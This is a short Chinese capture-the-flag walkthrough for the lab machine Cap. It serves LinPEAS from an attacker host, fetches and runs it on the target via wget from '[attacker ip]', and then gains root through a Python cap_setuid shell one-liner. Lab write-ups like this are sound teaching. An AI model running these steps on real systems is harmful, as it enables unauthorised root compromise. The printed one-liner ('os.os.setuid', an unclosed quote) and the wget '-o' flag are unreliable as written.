Linpeas與winpeas的功能類似,只是作業系統的不同,我們直接來看範例。
我以靶機Cap為例,首先將linepeas.sh從github上下載。
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh
接著,一樣在我們的主機上開啟網頁伺服器,讓我們能夠將linpeas.sh傳送至目標主機上。
sudo python3 -m http.server 80
在受害主機上執行以下程式碼,將linepeas.sh傳送至受害主機本地。
wget http://[attacker ip]:80/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee output.txt
第一行程式碼向駭客主機的port80發送請求,獲取linpeas.sh檔案,chmod
為修改檔案的模式,+x
讓我們能夠在目標主機執行linpeas.sh,最後一行執行linpeas.sh,並且將結果輸出至output.txt中。
cat output.txt
從結果我們看到,可以利用python設置cap_setuid,cap_setuid是linux作業系統裡的權限設置,如果uid為0,代表為root使用者。
python3 -c 'import os; os.os.setuid(0); os.system("/bin/sh")
接著,我們利用python設置uid為0,將權限提升至root,並且執行shell,我們就取得了最高的權限,接下來取得root.txt就完成了。